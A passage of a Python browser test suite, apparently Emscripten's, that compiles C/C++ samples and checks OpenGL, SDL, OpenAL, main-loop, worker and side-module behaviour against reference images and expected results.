(Path('third_party/glbook/Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('third_party/glbook/CH09_SimpleTexture2D.png')),
(Path('third_party/glbook/Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('third_party/glbook/CH10_MultiTexture.png')),
(Path('third_party/glbook/Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('third_party/glbook/CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('third_party/glbook/Common'),
test_file('third_party/glbook/Common/esUtil.c'),
test_file('third_party/glbook/Common/esShader.c'),
test_file('third_party/glbook/Common/esShapes.c'),
test_file('third_party/glbook/Common/esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-sFULL_ES3=1', '-sUSE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest_exit('emscripten_api_browser.c', args=['-sEXPORTED_FUNCTIONS=_main,_third', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(Path('sub/test.data'), 'test.data')
self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest_exit('emscripten_api_browser_infloop.cpp', assert_returncode=7)
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest_exit('emscripten_fs_api_browser.c', assert_returncode=1, args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=0"])
self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME']]:
self.btest_exit('emscripten_main_loop.cpp', args=args)
@parameterized({
'': ([],),
# test pthreads + AUTO_JS_LIBRARIES mode as well
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sAUTO_JS_LIBRARIES=0'],),
})
@requires_threads
def test_emscripten_main_loop_settimeout(self, args):
self.btest_exit('emscripten_main_loop_settimeout.cpp', args=args)
@parameterized({
'': ([],),
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],),
})
@requires_threads
def test_emscripten_main_loop_and_blocker(self, args):
self.btest_exit('emscripten_main_loop_and_blocker.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp')
@parameterized({
'': ([],),
'worker': (['--proxy-to-worker'],),
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],)
})
@requires_threads
def test_emscripten_main_loop_setimmediate(self, args):
self.btest_exit('emscripten_main_loop_setimmediate.cpp', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest_exit('sdl_quit.c', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest_exit('sdlglshader2.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@parameterized({
'': ([],),
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER'],),
})
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self, args):
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-sRELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sGL_DEBUG', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre3.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-sUSE_PTHREADS', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(Path('third_party/cubegeom', 'cubegeom_proc.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_glew.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color.c'), reference=Path('third_party/cubegeom', 'cubegeom_color.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_normal.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_mt.c'), reference=Path('third_party/cubegeom', 'cubegeom_mt.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color2.c'), reference=Path('third_party/cubegeom', 'cubegeom_color2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_texturematrix.c'), reference=Path('third_party/cubegeom', 'cubegeom_texturematrix.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_fog.c'), reference=Path('third_party/cubegeom', 'cubegeom_fog.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2_vao2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao_es.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sFULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_u4fv_2.c'), reference=Path('third_party/cubegeom', 'cubegeom_u4fv_2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-sGL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-sLEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-sSTRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point {
int x, y;
};
''')
create_file('supp.c', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point *p) {
printf("supp: %d,%d\n", p->x, p->y);
mainFunc(p->x + p->y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.c', r'''
#include <stdio.h>
#include <assert.h>
#include "header.h"
extern void suppFunc(struct point *p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
assert(x == 56);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(&p);
printf("main see: %d\nok.\n", suppInt);
assert(suppInt == 76);
return 0;
}
''')
self.run_process([EMCC, 'supp.c', '-o', 'supp.wasm', '-sSIDE_MODULE', '-O2'])
self.btest_exit('main.c', args=['-sMAIN_MODULE=2', '-O2', 'supp.wasm'])
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
self.set_setting('WASM_ASYNC_COMPILATION', 0)
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
args = ['-sWASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1']
# with assertions, we notice when memory was written to too early
expected = 'abort:Assertion failed: native function `note` called before runtime initialization'
self.btest('mem_init.cpp', expected=expected, args=args)
# otherwise, we just overwrite
self.btest_exit('mem_init.cpp', args=args + ['-sASSERTIONS=0'])
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
maybeReportResultToServer('got_error');
}
console.log('WARNING: ' + x);
};
''')
self.btest('mem_init_request.cpp', expected=status, args=['-sWASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
self.set_setting('EXIT_RUNTIME')
test('test.html.mem', 'exit:0')
test('nothing.nowhere', 'got_error')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3:' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-sWASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(Path('browser/cwrap_early.cpp'), args=['-O2', '-sASSERTIONS', '--pre-js', test_file('browser/cwrap_early.js'), '-sEXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-O2', '--minify=0', '-sEXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one', '-sASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_with_pthread_compilation_fails(self):
self.run_process([EMCC, '-c', '-o', 'hello.o', test_file('hello_world.c')])
stderr = self.expect_fail([EMCC, 'hello.o', '-o', 'a.js', '-g', '--closure=1', '-sUSE_PTHREADS', '-sBUILD_AS_WORKER=1'])
self.assertContained("USE_PTHREADS + BUILD_AS_WORKER require separate modes that don't work together, see https://github.com/emscripten-core/emscripten/issues/8854", stderr)
def test_emscripten_async_wget2(self):
self.btest_exit('test_emscripten_async_wget2.cpp')
@disabled('https://github.com/emscripten-core/emscripten/issues/15818')
def test_emscripten_async_wget2_data(self):
create_file('hello.txt', 'Hello Emscripten!')
self.btest('test_emscripten_async_wget2_data.cpp', expected='0')
def test_emscripten_async_wget_side_module(self):
self.run_process([EMCC, test_file('browser_module.c'), '-o', 'lib.wasm', '-O2', '-sSIDE_MODULE'])
self.btest_exit('browser_main.c', args=['-O2', '-sMAIN_MODULE=2'])
@parameterized({
'non-lz4': ([],),
'lz4': (['-sLZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-sSIDE_MODULE', '-O2', '-o', 'library.so'])
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return preloadedWasm['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
